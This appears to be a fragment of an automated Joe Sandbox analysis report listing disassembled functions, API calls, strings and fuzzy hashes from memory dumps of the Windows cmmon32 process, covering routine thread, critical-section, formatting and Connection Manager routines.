                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$[$]:%u
                                                          • API String ID: 48624451-2819853543
                                                          • Opcode ID: 2cb68ac70f19d203ada33fa8325116b8d51215d49f8de786f18a2f7d9f67f578
                                                          • Instruction ID: b8374c4824391967f826d5f405bcfffbcc1e959caacb48b3662cdc47e5a913ab
                                                          • Opcode Fuzzy Hash: 2cb68ac70f19d203ada33fa8325116b8d51215d49f8de786f18a2f7d9f67f578
                                                          • Instruction Fuzzy Hash: BE21537AA0012AABDB10DEA9D844ABE77FAEF44658F040156EA05D3200E734AA119BA1
                                                          Function 00334133 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,00334190,?,00000000,?), ref: 00334149
                                                          • GetLastError.KERNEL32(?,00000000,?), ref: 00334155
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00334178
                                                          Strings
                                                          • CCmConnection::StartConnectionThread CreateThread succeeded, xrefs: 0033416C
                                                          • CCmConnection::StartConnectionThread CreateThread failed: 0x%x, xrefs: 0033415C
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                          • Associated: 0000000E.00000002.3714532226.0000000000339000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_330000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateErrorHandleLastThread
                                                          • String ID: CCmConnection::StartConnectionThread CreateThread failed: 0x%x$CCmConnection::StartConnectionThread CreateThread succeeded
                                                          • API String ID: 747004058-682360242
                                                          • Opcode ID: b02da26ce81d41ec2a6dcc0cf3a8616bf6c2b0ceaac91f6061483e61ec1609f4
                                                          • Instruction ID: e673bf817fc15879d69a2313c5761abb5ff4482e8a35f48ac3851bf7be5dab6a
                                                          • Opcode Fuzzy Hash: b02da26ce81d41ec2a6dcc0cf3a8616bf6c2b0ceaac91f6061483e61ec1609f4
                                                          • Instruction Fuzzy Hash: 58E06DB3A14610BF6B1B67B1AC8BDBB269DDA85322F110111FC02D6040F990ED8085B1
                                                          Function 04C1F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C602E7
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C602BD
                                                          • RTL: Re-Waiting, xrefs: 04C6031E
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: 1da5ff1b58865401911727224cd10538b29236a40455183d4355c1abde4f9abb
                                                          • Instruction ID: ac4f30c831856e1a4dfa5f4b5e92373d77d2983fcbc038bd7c661c35155e9924
                                                          • Opcode Fuzzy Hash: 1da5ff1b58865401911727224cd10538b29236a40455183d4355c1abde4f9abb
                                                          • Instruction Fuzzy Hash: DAE1E0706047419FD725CF29C884B2AB7E2BF8A314F144A6DF4A69B2E0E774F944DB42
                                                          Function 04C2BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04C67B7F
                                                          • RTL: Resource at %p, xrefs: 04C67B8E
                                                          • RTL: Re-Waiting, xrefs: 04C67BAC
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 0-871070163
                                                          • Opcode ID: e5ffcd820394e3e335dc61d2faf98b46e318350b89783b636747a131c1ccabc9
                                                          • Instruction ID: 50cc67b6423b51f0044de43285a42ad0fb09b259c3db6f8a1ce9f241171b878b
                                                          • Opcode Fuzzy Hash: e5ffcd820394e3e335dc61d2faf98b46e318350b89783b636747a131c1ccabc9
                                                          • Instruction Fuzzy Hash: DC41E3353057029FD720DE25C980B6AB7E6FF88714F000A1DF95ADB680EB71F9059B91
                                                          Function 04C2B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C6728C
                                                          Strings
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04C67294
                                                          • RTL: Resource at %p, xrefs: 04C672A3
                                                          • RTL: Re-Waiting, xrefs: 04C672C1
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          • Opcode ID: 878165137ce5919c766076898ce6b1273811c2a903d82f2286173266bbffb30f
                                                          • Instruction ID: 33d566f848a8597b64e7b45d4a90497388957a65f9357bcd8762ebd88ea9a3fb
                                                          • Opcode Fuzzy Hash: 878165137ce5919c766076898ce6b1273811c2a903d82f2286173266bbffb30f
                                                          • Instruction Fuzzy Hash: D1412231701612ABE720DE25CD81F7AB7A2FF84718F144A19F956EB240EB70F9429BD0
                                                          Function 04CA2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: b1f21c37ba3e34dde17159cb96fdca3ef1c4f976cf76d0fff628bdd25901d4e8
                                                          • Instruction ID: c0d434acb15e5117ae63a0a12199602715b15d7986c604ccebcb8c9c70bb7874
                                                          • Opcode Fuzzy Hash: b1f21c37ba3e34dde17159cb96fdca3ef1c4f976cf76d0fff628bdd25901d4e8
                                                          • Instruction Fuzzy Hash: F6318472A0122A9FDB20DE29DC40BFE77FDEF45614F440595E949E3200EB30BA559BA1
                                                          Function 00334A16 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsLogonAsSystem.CMUTIL(00000000,?,0033496F,?,?,?), ref: 00334A1E
                                                          • ?GPPB@CIniW@@QBEHPBG0H@Z.CMUTIL(Connection Manager,AutoReconnect,00000000,?,?,?), ref: 00334A39
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                          • Associated: 0000000E.00000002.3714532226.0000000000339000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_330000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: LogonSystem
                                                          • String ID: AutoReconnect$Connection Manager
                                                          • API String ID: 39500261-4026703651
                                                          • Opcode ID: c7d07846c7fa71d70ff5f91e616898001f14c8b96e93968b429823f7c6f55d54
                                                          • Instruction ID: d1f8ca662874eacb7727ce02517898fd52e8d21f0fd9650486daeaea0c4a5ebc
                                                          • Opcode Fuzzy Hash: c7d07846c7fa71d70ff5f91e616898001f14c8b96e93968b429823f7c6f55d54
                                                          • Instruction Fuzzy Hash: D1D05E327440616786268A26BCCC9C7EA599FD1B61F164166F815E3210DAA04C4585C0
                                                          Function 04C37D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-
                                                          • API String ID: 1302938615-2137968064
                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction ID: 2f146b7664ecb33a512d2219eb71f3472eab21e1fcab81dcf1f41464745f177c
                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction Fuzzy Hash: 569195B1E012159FDF24DF69C8806BEB7A7BF48722F14C51AF855A72C0E734BA409760
                                                          Function 04BF9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: 810de407925839a368741c10e7f91e58c2d40af2edc6057bb335762e025c7685
                                                          • Instruction ID: 3bfc5406246ab6d348ac1217cd2ebaeec8ed3fa8eb9a9a5f4f61751bfb34fa92
                                                          • Opcode Fuzzy Hash: 810de407925839a368741c10e7f91e58c2d40af2edc6057bb335762e025c7685
                                                          • Instruction Fuzzy Hash: 1A812BB5D002699BDB31CF54CC44BEEB7B5AB08714F0041EAAA1DB7290E7706E84DFA4
                                                          Function 0033393F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 003365D7: memset.MSVCRT ref: 003365FE
                                                            • Part of subcall function 003365D7: WideCharToMultiByte.KERNEL32(00000000,00000400,000000FF,000000FF,00000000,00000000,00000000,00000000,00000000,=====================================================,00000208), ref: 00336623
                                                            • Part of subcall function 003365D7: LocalAlloc.KERNEL32(00000040,00000000), ref: 00336632
                                                            • Part of subcall function 003365D7: WideCharToMultiByte.KERNEL32(00000000,00000400,000000FF,000000FF,00000000,00000000,00000000,00000000), ref: 0033664D
                                                            • Part of subcall function 003365D7: lstrlenA.KERNEL32(?,00000000,00000000,0033557B), ref: 00336680
                                                            • Part of subcall function 003365D7: LocalFree.KERNEL32(00000000,00000000,=====================================================,00000208), ref: 00336687
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,0033573D,User32.dll), ref: 00333960
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                          • Associated: 0000000E.00000002.3714532226.0000000000339000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_330000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocalMultiWide$AllocFreeLibraryLoadlstrlenmemset
                                                          • String ID: =W3$CDynamicLibrary - Loading library - %s
                                                          • API String ID: 4236014511-3960775831
                                                          • Opcode ID: d064c1dca2a23081594172e8771da419717770362e0ebede1e89cb5cf521d24e
                                                          • Instruction ID: caec05a232e4a2529df07ed8196d58a1ab95e72bab4e6a51a5cbd923f42248a6
                                                          • Opcode Fuzzy Hash: d064c1dca2a23081594172e8771da419717770362e0ebede1e89cb5cf521d24e
                                                          • Instruction Fuzzy Hash: 7BE0C2722442147BE7251A15EC47F8B3E88CF10330F144235F968D91D0E9A298509784